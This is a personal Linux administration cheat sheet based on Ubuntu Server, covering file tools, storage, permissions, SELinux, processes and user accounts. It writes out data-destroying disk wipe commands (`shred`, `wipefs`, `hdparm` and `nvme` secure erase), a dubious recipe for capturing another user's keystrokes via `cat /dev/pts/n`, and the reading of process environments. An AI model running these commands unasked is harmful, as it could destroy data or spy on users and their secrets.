My personal Linux system administration reference (based on Ubuntu Server)
- Todo
- Other Resources
- General and Misc
- Text and File Processing
- Storage and Filesystem
- Process Management
- User Administration
- System Management and Observability
- Networking
- Docker
- Git
- Bash
- Vim
- GDB
- Binary Analysis
- ASCII Art and Silly Stuff
- Credits
- Distinguish standard vs non-standard tools and filter out frivolous tools
- Distinguish or extract the most useful commands
- Pure bash Bible by dylanaraps (https://github.com/dylanaraps/pure-bash-bible)
- Pure sh Bible by dylanaraps (https://github.com/dylanaraps/pure-sh-bible)
- BusyBox is a package that contains many core Unix utilities needed for debugging. It's useful to install on a minimal machine when testing.
  - `busybox <common-unix-utility>` if you're just going to run a single command, maybe two
  - `busybox --install <dir-path>` to install the commands to that directory (usually `/sbin`) for standalone use of all commands
  - It comes pre-installed in the Docker Alpine image
- Help
  - `man` (an interface to the system reference manuals)
    - `-a intro` to display all `intro` man pages
    - `-k` or `apropos` (search the manual page names and descriptions)
    - `-f` or `whatis` (display one-line manual page descriptions)
  - `info` (read Info documents interactively)
  - `help` (display information about builtin commands)
  - `tldr` (simplified and community-driven man pages)
- `parallel`
- `glow`
  - `glow -p -w 0 file.md`
- `watch` (execute a program periodically, showing output fullscreen)
  - `watch -n 1 w` to execute `w` every second (`-n 1`) and refresh the screen with the updated output
- `env` (run a program in a modified environment)
- `printenv` (print all or part of the environment)
- Dates and Time
  - `date` (print or set the system date and time)
    - `date +%F` to print the date in format `YYYY-MM-DD`
    - `date +%Y%m%d` to print the date in format `YYYYMMDD`
    - `date +%j` to print the day of year (`j` stands for Julian, as in "the Julian day")
    - `date --date='now-100days'` to calculate the full and exact date of 100 days ago from now
  - `timedatectl` (control the system time and date)
    - See `/etc/localtime`
    - `timedatectl` to see current time settings
    - `timedatectl set-timezone America/Los_Angeles` to set the timezone to Los Angeles
    - `timedatectl list-timezones`
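The relative-date arithmetic above can be sanity-checked by anchoring `--date` to a fixed day (the `2024-01-11` anchor below is just an arbitrary example; assumes GNU `date`):

```shell
# Print today's date in ISO format
date +%F
# GNU date does relative arithmetic; anchoring to a fixed date makes it reproducible
date --date='2024-01-11 - 10 days' +%F   # → 2024-01-01
```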
- Package management
  - `dpkg` (package manager for Debian)
    - `dpkg -l`
    - `dpkg -L`
    - `dpkg -S`
  - `apt`
    - `apt list --installed` to list installed packages
    - `apt show <package>` to show information for a package
    - `apt search <string>` to find packages containing a specified string in their information (useful for finding the package a command belongs to)
- `tee` (read from standard input and write to standard output and files)
  - `date | tee <file>` writes the output of `date` to standard output and `<file>`
  - `tee -a <file>` to append to `<file>` instead of overwrite
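A quick sketch of both the overwrite and append modes (the `/tmp/tee_demo.txt` path is just an example):

```shell
# First write overwrites the file, second write appends to it;
# both lines also echo to standard output as they pass through tee
echo "first"  | tee /tmp/tee_demo.txt
echo "second" | tee -a /tmp/tee_demo.txt
cat /tmp/tee_demo.txt
```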
- `cat /dev/urandom` (when read, the `/dev/urandom` device returns random bytes using a pseudorandom number generator seeded from the entropy pool)
  - See `man urandom`
- Security
  - `clamav`
  - Intrusion prevention systems
    - `fail2ban`
  - Intrusion detection systems
    - `aide`
    - `snort`
    - `tripwire`
- `exiftool` (read and write meta information in files)
- `reset` (initialize or reset terminal state)
- `seq` (print a sequence of numbers)
  - `seq [from=1] <to>` to print numbers `from` to `to`, each on a new line
  - `seq 5` to print numbers 1 through 5, each on a new line
  - `seq 0 5` to print numbers 0 through 5, each on a new line
- `nl` (number lines of files)
  - `nl <file>` to print out file contents with line numbers
- `uniq` (report or omit repeated lines)
  - `uniq <file>` to print every unique line from `<file>`, omitting repetitions
  - `uniq -u <file>` to print every unique line that occurs once in `<file>`
- `csplit` (split a file into sections determined by context lines)
- `tr` (translate or delete characters)
- `cut` (remove sections from each line of files)
  - `cut -d ' ' -f1 <file>` to cut the first (`-f1`) section from `<file>`, delimited by blank spaces
- `bc` (an arbitrary precision calculator language)
  - `echo '1+2' | bc` to sum the expression
- `wc` (print newline, word, and byte counts for each file)
  - `wc -l` to count lines
- `head` (output the first part of files)
  - `-n <lines>` to output the first `<lines>` lines
  - `-c <bytes>` to output the first `<bytes>` bytes
- `tail` (output the last part of files)
  - `-n <lines>` to output the last `<lines>` lines
  - `-f <file>` to follow file changes, appending output as the file grows
- `sort` (sort lines of text files)
  - `-n` to sort numerically instead of lexicographically
  - `-r` to reverse order
  - `-k` to sort by key
    - `sort -k 2 <file>` to sort by the second column
- `paste` (merge lines of a file)
  - `paste <file> -sd+` to collapse the lines of a file into a single line with each element separated by `+`
  - Example: `seq 100 > numbers; paste numbers -sd+`
  - Mix and Match: `seq 100 > numbers; paste numbers -sd+ | bc` to sum the numbers in `numbers`
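The collapse-then-sum pattern can also be verified with shell arithmetic, which avoids depending on `bc` being installed:

```shell
# seq emits 1..100 on separate lines; paste -sd+ joins them into "1+2+...+100"
expr_str=$(seq 100 | paste -sd+ -)
# Arithmetic expansion evaluates the string held by the variable
echo $(( expr_str ))   # → 5050
```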
- `sed` (stream editor for filtering and transforming text)
  - `sed -n '275p' <file>` to print out the 275th line of `<file>`
- `awk` (pattern scanning and processing language)
  - `awk '{print $2}'` to print the second column of standard input
  - `awk '{if ($1>200) print $1,$2}'` to check if the first column of standard input is greater than 200 and print the first two columns if so
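A self-contained sketch of the conditional-print idiom above (the sample rows are made up):

```shell
# Columns: name value; print rows whose second column exceeds 200
printf 'a 250\nb 100\nc 300\n' | awk '{ if ($2 > 200) print $1, $2 }'
# → a 250
# → c 300
```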
- Diffing and patching
  - `diff` (compare files line by line)
    - `diff --color <file1> <file2>`
  - `patch` (apply a diff file to an original)
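A minimal roundtrip showing how the two fit together (the `/tmp/patch_demo` paths are illustrative; assumes GNU `diff` and `patch`):

```shell
rm -rf /tmp/patch_demo && mkdir -p /tmp/patch_demo && cd /tmp/patch_demo
printf 'one\ntwo\nthree\n' > original.txt
printf 'one\n2\nthree\n'   > modified.txt
# diff exits 1 when the files differ, so tolerate that in the pipeline
diff -u original.txt modified.txt > fix.patch || true
# Apply the unified diff in place; original.txt now matches modified.txt
patch original.txt < fix.patch
```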
- `hdparm` (get/set SATA/IDE device parameters)
  - `-I /dev/<sata-device>` to list device parameters for a SATA device
  - `hdparm --security-erase-enhanced NULL /dev/<sata-device>` to perform an optimized secure erase of a SATA device using an empty password (`NULL`)
- `nvme` (the NVMe storage command line interface utility; from `nvme-cli`)
  - `nvme format /dev/<nvme-device> -s 1` to perform a secure erase of an NVMe disk
  - See `man nvme-format`
- `/dev/zero` is a continuous stream of zeroes
- `stat` (display file or file system status)
- `ls -l <file-name>` follows the format `<mode> <hard-link-count> <owner> <group> <size> <last-modified-month> <last-modified-day> <last-modified-time> <file-name>` (note the timestamp is the last modification time, not creation time)
- `du` (estimate file space usage)
  - `-h` for human-readable format
  - `-s` for summary
- `df -h` (report file system space usage in human-readable format)
- `grep` (print lines that match patterns)
  - `grep -Iri --exclude-dir=.git "<search-pattern>"` to search for `<search-pattern>`, excluding binaries (`-I`), recursively (`-r`), case insensitive (`-i`), and excluding `.git/`
  - `grep -wE "53|67|68" /etc/services` to look up what ports 53, 67, and 68 correspond to in `/etc/services`
  - `grep '^word' <file>` to find instances of `word` that are at the beginning of a line
  - `-E` to allow "extended" regular expressions (or use `egrep`)
  - `-R` to search recursively through subdirectories (or use `rgrep`)
  - `-F` to interpret `<search-pattern>` as fixed strings, not regular expressions
  - `-w` to search whole words
  - `-l` to print only the filename on match and continue to the next file
  - `-v` to print non-matching lines
  - `-e` protects patterns beginning with `-`
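A small sketch of counting (`-c`), whole-word matching (`-w`), and line anchoring together (the sample file contents are made up):

```shell
printf 'word one\nanother word\nwords\n' > /tmp/grep_demo.txt
# Lines that START with "word": "word one" and "words"
grep -c '^word' /tmp/grep_demo.txt   # → 2
# Whole-word matches only, so "words" is excluded
grep -cw 'word' /tmp/grep_demo.txt   # → 2
```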
- `find`
  - Common example: `find <path> -name <filename>` to find a file
  - Flags:
    - `-exec <command> {} +` to execute `<command>` on the found files (`{}` expands to the found paths)
    - `-executable` to find files with execute permissions
    - `-name "*.sh"` to find files with a `.sh` suffix
    - `-perm 777`
    - `-perm -022`
    - `-perm /6000` to find setuid (4000) and setgid (2000) programs
    - `-type f` to find files
    - `-type d` to find directories
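A sketch combining `-name`, `-exec ... {} +`, and `-executable` on a throwaway tree (the `/tmp/find_demo` path is illustrative):

```shell
rm -rf /tmp/find_demo && mkdir -p /tmp/find_demo/nested
touch /tmp/find_demo/run.sh /tmp/find_demo/nested/data.txt
# Batch-execute chmod on every matching file; {} expands to the found paths
find /tmp/find_demo -name '*.sh' -exec chmod +x {} +
find /tmp/find_demo -type f -executable   # → /tmp/find_demo/run.sh
```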
- `cpio` (copy files to and from archives)
- `mkfifo` (make FIFOs (named pipes))
- `dd` (convert and copy a file)
  - Flags:
    - `if=<file>` to specify a file to read from instead of standard input
    - `of=<file>` to specify a file to write to instead of standard output
    - `bs=<size>` to specify the block size to both read from the input file and write out to the output file
    - `count=<count>` to specify the number of blocks to copy
  - Example: `dd if=/dev/zero of=zeroes bs=1M count=2` to read 2MB (`count` blocks of size `1M`) of zeroes from `/dev/zero` and write them out to `zeroes`
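The example above scaled down to something safe to run anywhere (writes 4 KiB to an illustrative `/tmp` path):

```shell
# Read 4 blocks of 1K (4096 bytes) of zero bytes and write them to a file;
# dd reports its transfer stats on stderr, silenced here
dd if=/dev/zero of=/tmp/zeroes.bin bs=1K count=4 2>/dev/null
wc -c < /tmp/zeroes.bin   # → 4096
```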
- `tar`
  - `tar -vczf files.tar.gz file1 file2 file3` to create (`-c`) a `gzip`-compressed (`-z`) archive named `files.tar.gz` (`-f files.tar.gz`) out of the listed files
  - `tar -vxf files.tar.gz` to both decompress (if applicable) and extract (`-x`) the archive `files.tar.gz` (`-f files.tar.gz`) into the CWD
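A create-then-extract roundtrip under an illustrative `/tmp/tar_demo` directory (`-C`, used here to extract into a subdirectory, isn't covered above):

```shell
rm -rf /tmp/tar_demo && mkdir -p /tmp/tar_demo/out && cd /tmp/tar_demo
echo alpha > file1
echo beta  > file2
tar -czf files.tar.gz file1 file2   # create a gzip-compressed archive
tar -xzf files.tar.gz -C out        # extract into out/ (-C changes directory first)
```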
- Prefer `hdparm` (SATA) and `nvme-cli` (NVMe) for more proper and significantly faster hardware-based secure erasure (let the drive erase itself internally) rather than software-based erasure (manual sequential writing of bytes), which usually doesn't account for "smarter" modern drive features such as wear leveling or sector remapping, which can prevent actual full secure erasure
- `shred` (overwrite a file to hide its contents, and optionally delete it; do not use without understanding the caveats listed in the documentation referenced below; almost certainly use `hdparm` or `nvme-cli` instead)
  - Read the caveats before use: https://www.gnu.org/software/coreutils/manual/html_node/shred-invocation.html#shred-invocation
  - `-v` to show progress
  - `-z` to zero the file after overwriting to hide shredding
  - `-u` to delete the file after overwriting
  - Example procedure:
    - `wipefs --all /dev/<device>` (see `wipefs`)
    - `shred -vz /dev/<device>` to overwrite the disk with random data and then zero it
    - Optional: `blockdev --rereadpt` (see `blockdev`) to inform the kernel that the partition table has been modified (assuming you overwrote a disk with partitions before clearing them out). This may not be enough, and you may need to just reboot instead.
- `nwipe` (securely erase disks)
- `/etc/fstab` (static information about the filesystems)
  - See `man fstab` for field descriptions and proper usage information
  - The system administrator manages this file; other programs only read it
  - Configures filesystems and where/how to mount them at startup
  - Format: `<device> <mount-point> <filesystem-type> <options> <dump> <pass>`
  - `mount -a` to mount changes specified in the configuration file
- `/dev/sda1` would be the first partition (`1`) of the first detected (`a`) disk (`sd`, short for "SCSI Disk", an old format)
- `lsblk` (list block devices)
  - `lsblk` to list block devices
  - `-f` for an overview of filesystem data
- `blkid` (locate/print block device attributes; can typically just use `lsblk -f`)
- `dumpe2fs` (dump ext2/ext3/ext4 file system information)
  - `dumpe2fs /dev/<device>` to dump filesystem information for a device
- `wipefs` (wipe a signature from a device)
  - `wipefs /dev/<device>` to print information about a device and its partitions
  - `wipefs --all /dev/<device>` to erase all partition signatures and inform the kernel of the change
- `fdisk` (manipulate disk partition table)
  - `fdisk -l [device]` to list information and partition tables for all devices or the specified device
- `mkfs` (build a Linux filesystem; lets you format a device)
  - `mkfs.vfat /dev/<device>`
- `tune2fs` (adjust tunable file system parameters on ext2/ext3/ext4 file systems)
  - `tune2fs -l /dev/<device>` to list the contents of the file system superblock, including configurable parameters
- `blockdev` (call block device ioctls from the command line)
  - `--rereadpt` to request the kernel to re-read the partition table
- `findmnt` (find a filesystem)
- `mount` (mount a filesystem)
  - `mount` to see mounted filesystems
    - Reads from `/proc/mounts` (symlink to `/proc/self/mounts`) (or the deprecated `/etc/mtab` on older systems)
  - `-a` to mount filesystems specified in `/etc/fstab`
  - `mount /dev/<device> /mnt/<mount-point>` to mount a device to a mount point
- `umount` (unmount filesystems)
  - `umount /mnt/<mount-point>` to unmount the filesystem mounted at a mount point
- `/proc/self/mountinfo` contains a table of mounted filesystems (generated by the kernel)
- See `man lvm`
- Physical volumes (PVs)
  - `pvs [PVs]` to list physical volumes
  - `pvdisplay [PVs]` to display detailed information about physical volumes
  - `pvcreate <disks>` to turn disks into physical volumes
  - `pvremove <PVs>` to remove LVM labels from physical volumes
- Volume groups (VGs)
  - `vgs [VGs]` to list volume groups
  - `vgdisplay [VGs]` to display detailed information about volume groups
  - `vgcreate <name> <PVs>` to create a volume group
  - `vgremove <VGs>` to remove volume groups
- Logical volumes (LVs)
  - `lvs [LVs]` to list logical volumes
  - `lvdisplay [LVs]` to display detailed information about logical volumes
  - `lvcreate -n <name> <VG>` to create a logical volume
    - `-l <extent>` to specify the logical extent
  - `lvremove <LVs>` to remove logical volumes
DAC is the baseline access control scheme, where the owner of a resource (file, process, etc) specifies its permissions.
- NOTE! When changing file permissions, especially recursively, beware of changing directories, regular files, scripts, and so on indiscriminately
  - Typically, you'll want to use `find` in the form of `find <path> -type d -exec chmod -c <xxx> {} +` to set the appropriate permissions for, in this example, directories (using `-type d` for directories)
  - For example:
    - Directory: With `r` set on a directory, a user can read its contents. If `x` is also set, a user can `cd` into the directory
    - Regular file: With `r` set on a regular file, a user can read its contents. If `x` is also set, a user can execute it. This should not be set if the file is not supposed to be a directly-executable script
    - Thus, while it's okay to mark subdirectories with the `x` bit (if you're okay with the user traversing them), setting `x` on regular files should be done discriminately, not en masse
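The directory/file split described above, sketched on a throwaway tree (`/tmp/perm_demo` and the chosen modes are illustrative):

```shell
rm -rf /tmp/perm_demo && mkdir -p /tmp/perm_demo/sub
echo data > /tmp/perm_demo/sub/notes.txt
# Directories get traversal (x); regular files do not
find /tmp/perm_demo -type d -exec chmod -c 755 {} +
find /tmp/perm_demo -type f -exec chmod -c 644 {} +
stat -c '%a %n' /tmp/perm_demo/sub /tmp/perm_demo/sub/notes.txt
```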
- `chmod` (change file mode bits)
  - `-c` to show changes
  - `-R` for recursive
- `chattr` (change file attributes on a Linux file system)
- `chgrp` (change group ownership)
  - `chgrp -c <group> <file>` to change `<file>`'s group to `<group>` and show changes made (`-c`)
  - `-R` for recursive
- `chown` (change file owner and group)
  - `chown -c <user> <file>` to change `<file>`'s owner to `<user>` and show changes made (`-c`)
  - `-R` for recursive
- `umask` (display or set the file mode creation mask)
  - `umask` to see the current file mode creation mask
  - `umask <mask>` to set the file mode creation mask
  - Example:
    - With a default regular file creation mode of `0666` (RW for UGO) and a default umask of `0022`, `touch testfile` will create `testfile` with permissions `0644` (`0666 & ~0022`)
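The mask arithmetic can be demonstrated with a non-default umask in a subshell (illustrative path and mask):

```shell
rm -f /tmp/umask_demo
(
  umask 0027                  # subshell keeps the change ephemeral
  touch /tmp/umask_demo       # 0666 & ~0027 = 0640
)
stat -c %a /tmp/umask_demo    # → 640
```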
ACL extends/complements the standard DAC scheme, providing more fine-grained control over resource permissions.
- See `man acl`
- `getfacl` (get file access control lists)
- `setfacl` (set file access control lists)
  - Setting the default ACL for a directory causes new subdirectories and files to inherit those default ACLs
  - `setfacl -m u:<username>:rwx <file>` to allow R/W/X on a file for the user
  - `setfacl -m u::rwx <file>` to set R/W/X for the file's owning user (an empty user field means the owner)
  - `setfacl -x u:<username> <file>` to remove the ACL permissions set for the user
MAC is another access control scheme which provides a global configuration of resource permissions, typically managed by root rather than resource owners. The kernel checks DAC and ACL permissions on resource access before MAC, overriding the former two if more restrictive.
It is commonly found in the SELinux (Security-Enhanced Linux) and AppArmor Linux kernel modules.
Security-Enhanced Linux (SELinux) is an implementation of a flexible mandatory access control architecture in the Linux operating system
- See `man selinux`
- Red Hat Enterprise Linux documentation on SELinux: https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/10/html/using_selinux/getting-started-with-selinux
- Rocky Linux documentation on SELinux: https://docs.rockylinux.org/guides/security/learning_selinux/
- `sestatus` for SELinux status
  - `-v` to see file and process contexts
  - `-b` to see policy booleans
- Configuration: `/etc/selinux/config`
- `getenforce` (get the current mode of SELinux)
- `setenforce` (modify the mode SELinux is running in)
  - `setenforce [ Enforcing | Permissive | 1 | 0 ]`
- `ls -Z [<file>]` (print any security context)
- `ps -eM` or `ps axZ` to see the security label of every running process
- `getsebool` to get SELinux boolean values
  - `getsebool -a` to get all boolean values
  - `getsebool httpd_can_connect_ftp` to get the value of the `httpd_can_connect_ftp` boolean
- `setsebool` (set SELinux boolean value)
  - `setsebool httpd_can_network_connect on` to set the `httpd_can_network_connect` boolean on; resets on reboot
  - `setsebool -P httpd_can_network_connect on` to set the `httpd_can_network_connect` boolean on, permanently (`-P`)
- The current process:
  - `echo $$` to print the PID of the current running process
  - `cd /proc/self/` to access the data for the current running process
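A quirk worth internalizing: `/proc/self` resolves to whichever process opens it, as this sketch shows:

```shell
echo $$                 # PID of the current shell
# /proc/self always points at the process doing the looking --
# here that's the cat process itself, so its name reads back as "cat"
cat /proc/self/comm     # → cat
```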
- `ltrace` (library call tracer)
  - `ltrace -p <PID>` to monitor library calls made by process `<PID>`
- `strace` (trace system calls and signals)
  - `strace -p <PID>` to monitor syscalls made by process `<PID>`
  - `strace -p <PID> -e trace=read` to trace `read` syscalls emitted from process `<PID>`
  - `strace <command>` to run `<command>` under `strace` observation
  - Mix and Match: `strace -p $(pgrep <process-name>)`
- `lsof` (list open files)
  - `lsof /dev/tty1` to list processes currently using that file
  - `lsof -i :22` to list processes using or listening on any network address on port 22 (`ss -p` and variants are the modern ways to do this)
- `ps` (report a snapshot of the current processes)
  - `ps` to report on all processes with the same EUID as the current user and processes associated with the same terminal as the invoker
  - `ps <pid>` to report on a specific process
  - `-f` for full format
  - `ps -eM` or `ps axZ` to see the security label of every running process
  - Mix and Match: Use a bracket expression trick `[<char>]` in `grep`'s regular expression parsing to remove `grep`'s process from `ps` output: `ps -ef | grep -i [s]sh`
    - See `Character Classes and Bracket Expressions` in `man grep`
    - This works because `grep`'s process command line now technically contains `[s]sh`, which still expands to `ssh` as our actual search term
  - Standard syntax
    - `ps -ef --forest` to see every process on the system using standard syntax and with an ASCII art process tree (`--forest`)
    - `-F` for extra full format
  - BSD syntax
    - `ps aux` to see every process on the system using BSD syntax
    - `ps axjf` to print a process tree
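The bracket-expression trick, demonstrated against a throwaway `sleep` instead of `ssh`:

```shell
sleep 30 &
pid=$!
# The grep process's own command line contains "[s]leep 30", which the
# regex /sleep 30/ does not match, so grep doesn't list itself
ps -ef | grep '[s]leep 30'
kill "$pid"
```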
- `pgrep`, `pkill`, `pidwait` (look up, signal, or wait for processes based on name and other attributes)
  - `pgrep -a '<name1>|<name2>'` to see processes matching `<name1>` or `<name2>` and show the full command lines for those processes
  - `pgrep -af <pattern>` to see processes matching `<pattern>`, as well as processes whose full commands contain `<pattern>`, and show the full command lines for those processes
  - `pgrep -u <user>` to see running processes attached to `<user>`
  - `pgrep -u <user> <process-name>` to see running processes matching `<process-name>` attached to `<user>`
- `fuser` (identify processes using files or sockets)
  - `fuser /dev/tty1` will show the PID of processes currently using that file
  - `fuser -v /dev/tty1` will show the user, PID, command, and how the access is being made, of processes using that file
  - `fuser -km /home` will kill (`-k`) all processes accessing the mounted directory (`-m`; as opposed to a regular file?) `/home`
  - `fuser -vm /home` will list all processes accessing the mounted directory (`-m`) `/home`
- Mix and Match: Access the data of a specific running process
  - `cd /proc/<PID>`
  - `ls -la`
  - `cat environ` to read the environment variables for the process
  - `cat cmdline` to read the full command which started the process
  - `strace -p <PID>` to monitor syscalls made by the process
- `pidstat` (report statistics for Linux tasks; from `sysstat`)
  - `-p <PID>` to report for a PID
- `su` (run a command with a substitute user and group ID)
  - `su` to drop into a `root` shell
  - `su <user>` to drop into a `<user>` shell
  - `su --login <user>` to drop into a `<user>` login shell
  - `-c <command>` to run a command as the user
  - `-s <shell>` to specify the shell
  - `-l` to start the shell as a login shell
- `sudo`
  - `-i` to run the login shell as `root` (ie, become `root`)
  - `-l [-U <user>]` to list a user's command privileges and `sudo` configurations as configured in the sudoers configuration (`/etc/sudoers` or `/etc/sudoers.d/`)
- `write` (send a message to another user)
  - `write <username> <tty-or-pts>` starts a session where you can send messages to the user on their tty, one way
- `mesg` (display (or do not display) messages from other users)
- `talk` (talk to another user)
- `wall` (write a message to all users)
- `whoami` (print effective user name)
- `id` (print real and effective user and group IDs)
  - `id` for output on the current user
  - `id <user>` for output on a specified user
- `groups` (print the groups a user is in; probably prefer `id`)
  - `groups` to show the groups the current user is in
  - `groups <user>` to show the groups `<user>` is in
- See who's logged in:
  - `who` and `w` read the binary log file `/var/run/utmp` to see currently logged in users
  - `who` (show who is logged on)
    - `who -H` to show who's logged in, with headings
    - `who -Ha` to show who's logged in, with most of the other flags enabled for detail
  - `w` (show who is logged on and what they are doing; probably prefer `who`)
  - `users` (print the user names of users currently logged in to the current host; probably prefer `who` or `w`)
- `last` (show a listing of last logged in users)
  - `last` outputs from most recent to least recent, so use with `head` or `less`
  - `last -a` reads the binary log file `/var/log/wtmp` to see past logins, with host names at the end (`-a`)
  - `last <username>` to see past logins from `<username>`
  - `last -p <time>` to see users who were present at `<time>`
  - `last -s <time>` to see past logins since `<time>`
  - `last -u <time>` to see past logins until `<time>`
  - `-x` to include shutdown entries and run level changes
  - `-d` to show DNS-resolved hostnames
  - `-i` to show IPs instead of names
- `lastb` reads the binary log file `/var/log/btmp` to see bad login attempts (I believe this is bad password attempts?)
- Mixed and Matched: Count past logins for a user or IP
  - `last <username-or-ip> | grep -c <username-or-ip>` (we use `grep` to search for `<username-or-ip>` again and count (`-c`) because `last` has a couple extra lines of output)
- Mixed and Matched: Monitor keystrokes
  - `who -H` to see users logged in and what terminal lines they're connected to
  - `ls /dev/pts` to see pseudoterminals
  - `cat /dev/pts/n` to capture keystrokes if the user is using a pseudoterminal (Tmux, SSH, etc)
  - `cat /dev/tty` to capture keystrokes if the user is using a standard terminal
  - `tty` vs `pty`
    - A `tty` is a console directly interacted with by the user
    - A `pty` (pseudoterminal) is a connection/interface established by a program like SSH or Tmux which allows tty-like interaction via it
    - See `man pts` (pseudoterminal master and slave)
- Group accounts:
  - `groupmod` (modify a group definition on the system)
    - `groupmod -U <user> -a <group>` to append (add) (`-a`) user `<user>` (`-U <user>`) to `<group>`
  - `groupadd` (create a new group)
  - `groupdel` (delete a group)
- User accounts:
  - See `sysusers.d` in the section: System Management and Observability
  - `useradd`
    - `useradd <new-user> -m -s /bin/bash -g <primary-group>` to create `<new-user>` with a home directory (`-m`), `bash` as shell (`-s /bin/bash`), and with primary group `<primary-group>` (`-g <primary-group>`) (NOTE(SECURITY): DO NOT SUPPLY A PLAINTEXT PASSWORD ON THE COMMAND LINE, SEE THE MANPAGE)
      - This creates a locked user account due to correctly not passing a password
      - This security warning applies to `usermod -p` as well
    - `passwd -de <new-user>` to effectively unlock the account, allow the new user to log in, and require them to set a password
      - NOTE(SECURITY): Only do this when the new user is ready to log in via password. If the user will only ever log in via SSH, they don't even need a password. You may keep the password locked and use their public key for authentication instead of password login.
  - `userdel`
  - `usermod` (modify a user account)
    - `usermod -a -G <group> <user>` to append (add) `<user>` to `<group>`
    - `usermod -p` to set a password on a locked `<user>` account (see the security warning above)
- `passwd` (change user password)
  - `passwd <user>` to change a user's password
  - Account status:
    - `passwd -S` to see account status for the current user
    - `passwd -Sa` to see the account status for all users
  - `passwd -d` to delete a user's password (make it empty)
  - `passwd -e` to immediately expire an account's password, requiring a change at next login
  - `passwd -i <INACTIVE-days>` to disable an account after the password has been expired for `<INACTIVE-days>`
  - `passwd --expiredate 1` to immediately disable an account, after setting the above
  - `passwd -l` to lock the password of a user so they cannot change it
  - `passwd -u` to unlock
- User account configuration and password information
  - `pwconv` to move salted password hashes from the public `/etc/passwd` to the locked-down `/etc/shadow` (use on old systems that haven't converted to using `/etc/shadow`)
  - `/etc/passwd` details user account configuration: `username:x:UID:GID:full-name:home-directory:shell`
    - The `x` in the password field means that passwords are stored in `/etc/shadow`, which has stricter permissions
  - `/etc/shadow` format (see `man shadow`): `username:encrypted-password:last-change-date:minimum-age:maximum-age:warning-period:inactivity-period:account-expiration-date:reserved`
  - All users can typically read `/etc/passwd`, but only `root` can modify it
  - Only `root` can access `/etc/shadow`
  - Salted password hashes are stored rather than the actual plaintext passwords
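The colon-separated format is easy to pull apart with `awk` (the account line below is a made-up sample, not read from the real `/etc/passwd`):

```shell
# Sample line in /etc/passwd format: user:password-field:UID:GID:full-name:home:shell
line='alice:x:1001:1001:Alice Example:/home/alice:/bin/bash'
echo "$line" | awk -F: '{ print "user=" $1, "uid=" $3, "shell=" $7 }'
# → user=alice uid=1001 shell=/bin/bash
```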
- Reading: https://www.redhat.com/en/blog/suid-sgid-sticky-bit
- SUID/SGID
  - The SUID (setuid) permission bit of a binary executable file
    - Sets the running EUID to that of the binary executable's owner rather than that of the user who actually executed it (RUID)
    - Represented by `4` in the user execution bit, or symbolic `s` if the owner has execute permission and `S` if the owner does not have execute permission
  - The SGID (setgid) permission bit of a binary executable file
    - Sets the running EGID to that of the binary executable's group owner rather than that of the primary group of the user who actually executed it (RGID)
    - Represented by `2` in the group execution bit, or symbolic `s` if the group has execute permission, or `S` if the group does not have execute permission
  - NOTE(SECURITY): For files owned by a privileged user/group, SUID/SGID can permit unprivileged users to execute a program with elevated privileges when the permissions for the file are not locked down (eg, if unprivileged users are allowed to execute an SUID/SGID file)
  - For security, shells such as Bash ignore setuid and run as the real user
  - Find SUID/SGID programs with `find / -perm /6000`
- The "sticky" permission bit
  - When set on a directory, prevents users from deleting or renaming contained files they do not own
  - Does nothing when applied to regular files
  - Represented by `1` or symbolic `t` in the other users execution bit
- RUID (real user ID) is the UID for the user who launched a process
- EUID (effective user ID) is the UID from which the process inherits its permissions
- Octal/symbolic permissions format:
Bit positions: 0 x 0 0 0 0
S U G O
| | | |
| | | Other users (rwx)
| | Group (rwx)
| User/owner (rwx)
Special (setuid/setgid/sticky)
UGO bits: 4 2 1
r w x
| | |
| | Execute
| Write
Read
S bits: 4 2 1
| | |
| | sticky (replaces Other Users' Execute bit with t if x set or T if x not set)
| setgid (SGID; replaces Group's Execute bit with s if x set or S if x not set; affects binaries only)
setuid (SUID; replaces User's Execute bit with s if x set or S if x not set; affects binaries only)
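The special bits above can be exercised without root on a file you own; this sketch sets setgid + sticky on top of `755` and reads the mode back (illustrative `/tmp` path; note that a non-root `chmod` may have the setgid bit cleared if the file's group isn't one of yours, which doesn't apply to a file you just created):

```shell
rm -f /tmp/modes_demo && touch /tmp/modes_demo
# 2000 (setgid) + 1000 (sticky) + 0755
chmod 3755 /tmp/modes_demo
# Symbolic form shows lowercase s and t because the x bits are also set
stat -c '%a %A' /tmp/modes_demo   # → 3755 -rwxr-sr-t
```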
- `sysusers.d` (declarative allocation of system users and groups)
  - See `man sysusers.d`
  - `systemd-sysusers` uses the files from the `sysusers.d` directory to create system users and groups and to add users to groups, at package installation or boot time
- `lsmod` (show the status of modules in the Linux Kernel)
  - Reads `/proc/modules`
- `sysctl` (configure kernel parameters at runtime)
  - `<variable>` to display a parameter
  - `-w <variable>=<value>` to set a parameter
  - `-a` to display all available parameters
  - `-p [file]` to reload the parameters set from `[file]` or `/etc/sysctl.conf`
  - `--system` to reload and display parameters set from the system's configuration files
- `hostname` (show or set the system's host name)
  - `/etc/hostname` specifies the persistent hostname (read on startup)
  - `hostname -I` to display IP addresses
- `uptime` (tell how long the system has been running, load averages, and how many users are logged in)
  - Reads and processes `/proc/uptime`
- `cat /etc/*release` to see system distribution information
  - See `find /etc/*release` to see the files read to obtain this information
- `uname` (print system information)
  - `uname -a` to print all information
- `lsb_release` (print distribution-specific information (minimal implementation))
  - `lsb_release -a` to show distributor ID, description, release number, and codename
- `cat /proc/cmdline` to see kernel command line options (TODO: Why is this different than the command line shown in `dmesg | head`?)
- `ulimit` (modify shell resource limits)
  - `ulimit -a` to report all current limits
  - `ulimit -c` to report the limit on core dump size for the current shell
    - `0` indicates that core dumping is disabled
  - `ulimit -c <limit>` to specify the size limit for core dumps
WARNING: Enabling core dumps -- particularly universally -- can be risky. A core dump is a snapshot of a process taken at the time a process exits abnormally. Since this snapshot contains the process's memory and execution context, it can contain sensitive information. Proper care should be taken to manage core dumps when enabled, such as restricting access to other users and regular deletion. Do your own research, and don't enable them blindly.
- See `man core`
- Ephemeral (for the current shell only)
  - `ulimit -c unlimited` to enable unlimited core dumps for the current shell only
- Persistent (using shell init configuration)
  - NOTE: This will enable core dumps only for processes launched by the shell rather than all processes launched through any means. You can modify the PAM limits configuration if you need core dumps enabled for all processes. In addition, for `systemd`-managed sessions, you can specify the core dump limit for a specific process
  - Append `ulimit -c unlimited` to your shell init (eg, `.bashrc`)
- Persistent (using PAM limits configuration; NOTE: Incomplete)
  - Create the drop-in `/etc/security/limits.d/99-coredump.conf`
  - TODO: Configuration file
- `/proc/sys/kernel/core_pattern` stores a pattern to specify the core save location or a pipe to a program to process it
  - Common core patterns
    - `core.%e.%p` to store core dumps beside the program (CWD is the default)
